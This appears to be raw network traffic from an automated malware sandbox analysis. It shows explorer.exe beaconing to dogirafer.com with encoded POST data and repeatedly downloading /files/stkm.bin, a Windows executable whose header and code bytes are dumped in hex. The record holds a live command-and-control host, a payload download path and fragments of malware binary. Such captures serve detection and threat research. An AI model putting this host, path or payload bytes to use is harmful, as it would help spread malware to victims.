                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2467&min_rtt=2448&rtt_var=956&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1122213&cwnd=209&unsent_bytes=0&cid=94e104f5611cb6ca&ts=754&x=0"
                                                                                                                                2024-12-17 16:56:55 UTC427INData Raw: 31 61 34 0d 0a 6e 56 35 6d 49 73 4a 4a 75 31 66 7a 4a 70 45 7a 68 6a 4e 43 47 33 76 4e 67 4f 74 63 72 6b 69 7a 47 55 56 61 6a 58 50 62 41 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 59 4c 6e 31 74 39 51 48 65 6a 36 6c 42 42 6f 54 45 42 30 50 5a 47 42 44 71 5a 79 6e 37 6a 36 57 64 66 67 33 31 62 37 65 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 50 51 2f 54 6e 42 49 4a 50 50 2f 4a 56 34 52 57 58 66 6b 6a 5a 2b 63 69 6f 4f 53 53 6b 4f 39 78 43 79 43 47 45 4a 73 4e 65 47 35 34 43 77 2b 6e 45 75 53 34 56 32 39 2f 44 47 37 6d 46 6b 2f 39 59 6a 44 50 70 46 36 72 78 4f 4c 58 4b 4c 70 56 68 30 4a 52 35 4c 30 56 61 32 45 53 6a 4b 6c 63 36 4e 50
                                                                                                                                Data Ascii: 1a4nV5mIsJJu1fzJpEzhjNCG3vNgOtcrkizGUVajXPbAALp5exDOPARyFkPbnOYLn1t9QHej6lBBoTEB0PZGBDqZyn7j6Wdfg31b7eyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvPQ/TnBIJPP/JV4RWXfkjZ+cioOSSkO9xCyCGEJsNeG54Cw+nEuS4V29/DG7mFk/9YjDPpF6rxOLXKLpVh0JR5L0Va2ESjKlc6NP
                                                                                                                                2024-12-17 16:56:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.649959104.21.16.14434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:56:58 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:56:59 UTC817INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:56:59 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2BlwlygCdEceJ3pFA05OZ9ZJHgFfOqgustRq%2BVePNdPthGhH%2B7NVTO8%2B6vffskXWCqmXNTLS7bUq9SBYJlyaz4M%2BWj7ph6aTPSCkyuhena%2FGdBsBc9fm5skyR9aaL%2FY9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387314fd910fa8-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=32426&min_rtt=1542&rtt_var=18946&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=1893644&cwnd=252&unsent_bytes=0&cid=fc9de5827ecf3625&ts=1685&x=0"
                                                                                                                                2024-12-17 16:56:59 UTC431INData Raw: 31 61 38 0d 0a 6d 56 74 72 4b 4d 70 49 75 56 66 38 4a 70 55 7a 68 6a 70 46 47 33 7a 44 68 2b 31 58 6f 45 75 7a 47 30 68 62 6a 48 62 56 41 67 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 57 4c 6e 78 72 38 41 58 53 6a 36 5a 45 44 34 66 44 42 30 76 5a 45 78 44 6a 5a 53 6e 30 35 73 75 61 66 41 37 31 59 62 72 2f 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 54 66 62 6a 44 6f 49 6a 50 5a 56 58 34 42 4b 54 4d 45 76 54 74 73 4b 75 4e 6b 4f 6f 50 4e 30 74 78 69 71 4f 62 66 64 68 65 62 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 1a8mVtrKMpIuVf8JpUzhjpFG3zDh+1XoEuzG0hbjHbVAgLp5exDOPARyFkPbnOWLnxr8AXSj6ZED4fDB0vZExDjZSn05suafA71Ybr/Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9TfbjDoIjPZVX4BKTMEvTtsKuNkOoPN0txiqObfdhebBDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:56:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.649965104.21.16.14434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:02 UTC126OUTGET /files/stkm.bin HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                2024-12-17 16:57:05 UTC927INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:05 GMT
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Length: 857600
                                                                                                                                Connection: close
                                                                                                                                Content-Disposition: attachment; filename = stkm.bin
                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                Last-Modified: Tue, 17 Dec 2024 16:57:04 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e81AU5UXAGGTEaFTrENIG5hABL%2FLH9aBKlEhLr6TYhJft1ZBjWV%2BQaPfUTkPbTvLyfCw0W4B8fVKEeE3Upu77gT3HgyUrFo0uvJw64xuE7jnwoTUGN7ZykFB3RNxCu6%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387331a9998ce0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1847&rtt_var=779&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=764&delivery_rate=1580942&cwnd=206&unsent_bytes=0&cid=8a08915f10c330c2&ts=4158&x=0"
                                                                                                                                2024-12-17 16:57:05 UTC442INData Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6
                                                                                                                                Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
                                                                                                                                2024-12-17 16:57:05 UTC1369INData Raw: 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 00
                                                                                                                                Data Ascii: p8Ph.text00 `bss@@.rdataPP@@.data``@.pdata
                                                                                                                                2024-12-17 16:57:05 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii:
                                                                                                                                2024-12-17 16:57:05 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii:
                                                                                                                                2024-12-17 16:57:05 UTC1369INData Raw: 00 00 eb 02 33 c0 48 81 c4 38 02 00 00 c3 cc 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 60 fd ff ff 48 81 ec a0 03 00 00 48 8d 0d 7b 4a 0c 00 c7 44 24 20 eb 2f 76 e0 48 8d 05 ac 46 0c 00 48 89 4c 24 28 48 89 44 24 30 48 8d 05 53 46 0c 00 48 89 44 24 48 48 8d 05 4f 46 0c 00 48 89 44 24 60 48 8d 05 4b 46 0c 00 48 89 44 24 78 48 8d 05 d7 46 0c 00 48 89 45 90 48 8d 05 3c 46 0c 00 48 89 45 a8 48 8d 05 39 46 0c 00 48 89 45 c0 48 8d 05 36 46 0c 00 48 89 45 d8 48 8d 05 33 46 0c 00 48 89 45 f0 48 8d 05 30 46 0c 00 48 89 45 08 48 8d 05 2d 46 0c 00 48 89 45 20 48 8d 05 32 46 0c 00 48 89 45 38 48 8d 05 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48 8d 05 23 46 0c 00 48 89 85 98 00 00 00 48 8d 05 1d 46 0c 00 48
                                                                                                                                Data Ascii: 3H8H\$H|$UH$`HH{JD$ /vHFHL$(HD$0HSFHD$HHOFHD$`HKFHD$xHFHEH<FHEH9FHEH6FHEH3FHEH0FHEH-FHE H2FHE8H/FHEPH,FHEhH)FHH#FHHFH
                                                                                                                                2024-12-17 16:57:05 UTC1369INData Raw: 45 0c 00 c7 44 24 20 3b 64 d2 03 48 89 44 24 28 48 8d 74 24 28 48 8d 05 4e 45 0c 00 c7 44 24 30 7f 27 64 e7 45 33 e4 48 89 44 24 38 45 8b f4 4c 8d 2d f4 bf 0a 00 e8 23 fa ff ff e8 1e fa ff ff 48 89 85 c0 01 00 00 48 85 c0 0f 84 e5 00 00 00 41 8b fc ff c7 66 45 39 64 7d 00 75 f6 41 8b dc 66 44 39 20 74 09 ff c3 66 44 39 24 58 75 f7 8d 14 3b 8d 14 55 02 00 00 00 48 8d 8d c0 01 00 00 e8 1d 0d 00 00 85 c0 0f 84 a8 00 00 00 4c 8b bd c0 01 00 00 8b c3 49 8d 0c 47 03 ff 74 17 49 8b d5 44 8b c7 48 2b d1 8a 04 0a 88 01 48 ff c1 49 83 e8 01 75 f2 33 d2 48 8d 4c 24 40 41 b8 50 02 00 00 49 8b dc e8 c8 59 08 00 48 8d 54 24 40 49 8b cf ff 15 4a 44 0c 00 48 8b f8 48 83 f8 ff 74 4a eb 26 41 8b d4 66 44 39 64 24 6c 74 0a ff c2 66 44 39 64 54 6c 75 f6 03 d2 48 8d 4c 24 6c
                                                                                                                                Data Ascii: ED$ ;dHD$(Ht$(HNED$0'dE3HD$8EL-#HHAfE9d}uAfD9 tfD9$Xu;UHLIGtIDH+HIu3HL$@APIYHT$@IJDHHtJ&AfD9d$ltfD9dTluHL$l


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.649978104.21.16.14434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:07 UTC150OUTGET /files/stkm.bin HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-17 16:57:08 UTC934INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:08 GMT
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Length: 857600
                                                                                                                                Connection: close
                                                                                                                                Content-Disposition: attachment; filename = stkm.bin
                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 4
                                                                                                                                Last-Modified: Tue, 17 Dec 2024 16:57:04 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QORYQ0bYfPuH%2Bj57eoClKpiUE%2FIDmxv1sX2Iq3CjjQuHQGCFiAVOuDXH5XwHkEdEQelgpUeiKFxMuvAphzGEt2rhqlLfptiLmI2W7obu%2BjEb2IFztgAKACByWF6YjBB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873517c734388-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1578&rtt_var=598&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=764&delivery_rate=1820448&cwnd=221&unsent_bytes=0&cid=02e1df5a220bc362&ts=1855&x=0"
                                                                                                                                2024-12-17 16:57:08 UTC435INData Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6
                                                                                                                                Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
                                                                                                                                2024-12-17 16:57:08 UTC1369INData Raw: 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70
                                                                                                                                Data Ascii: p8Ph.text00 `bss@@.rdataPP@@.data``@.p
                                                                                                                                2024-12-17 16:57:08 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii:
                                                                                                                                2024-12-17 16:57:08 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii:
                                                                                                                                2024-12-17 16:57:08 UTC1369INData Raw: 8d 4c 24 20 e8 cd 13 00 00 eb 02 33 c0 48 81 c4 38 02 00 00 c3 cc 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 60 fd ff ff 48 81 ec a0 03 00 00 48 8d 0d 7b 4a 0c 00 c7 44 24 20 eb 2f 76 e0 48 8d 05 ac 46 0c 00 48 89 4c 24 28 48 89 44 24 30 48 8d 05 53 46 0c 00 48 89 44 24 48 48 8d 05 4f 46 0c 00 48 89 44 24 60 48 8d 05 4b 46 0c 00 48 89 44 24 78 48 8d 05 d7 46 0c 00 48 89 45 90 48 8d 05 3c 46 0c 00 48 89 45 a8 48 8d 05 39 46 0c 00 48 89 45 c0 48 8d 05 36 46 0c 00 48 89 45 d8 48 8d 05 33 46 0c 00 48 89 45 f0 48 8d 05 30 46 0c 00 48 89 45 08 48 8d 05 2d 46 0c 00 48 89 45 20 48 8d 05 32 46 0c 00 48 89 45 38 48 8d 05 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48 8d 05 23 46 0c 00 48 89 85 98 00 00 00 48
                                                                                                                                Data Ascii: L$ 3H8H\$H|$UH$`HH{JD$ /vHFHL$(HD$0HSFHD$HHOFHD$`HKFHD$xHFHEH<FHEH9FHEH6FHEH3FHEH0FHEH-FHE H2FHE8H/FHEPH,FHEhH)FHH#FHH


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.649989104.21.16.14434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:11 UTC126OUTGET /files/stkm.bin HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                2024-12-17 16:57:11 UTC942INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:11 GMT
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Length: 857600
                                                                                                                                Connection: close
                                                                                                                                Content-Disposition: attachment; filename = stkm.bin
                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 7
                                                                                                                                Last-Modified: Tue, 17 Dec 2024 16:57:04 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FyuUuDpmoDVtUCHsS14B%2FVS67YhPILq%2B2%2FAYaUVp6wZxFARwp%2FLgpqDpQn2ETk0RTVgWd9Luu28t%2BdBjQdojRdZuTbC5AymzZFLzX5CEKGcos%2BfD9MSMdsGcr51e%2BSIi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387364fb0541ba-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1668&rtt_var=628&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=764&delivery_rate=1750599&cwnd=192&unsent_bytes=0&cid=33612bd31e4c3ce4&ts=1889&x=0"
                                                                                                                                2024-12-17 16:57:11 UTC427INData Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6
                                                                                                                                Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
                                                                                                                                2024-12-17 16:57:11 UTC1369INData Raw: 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii: [p8Ph.text00 `bss@@.rdataPP@@.data``
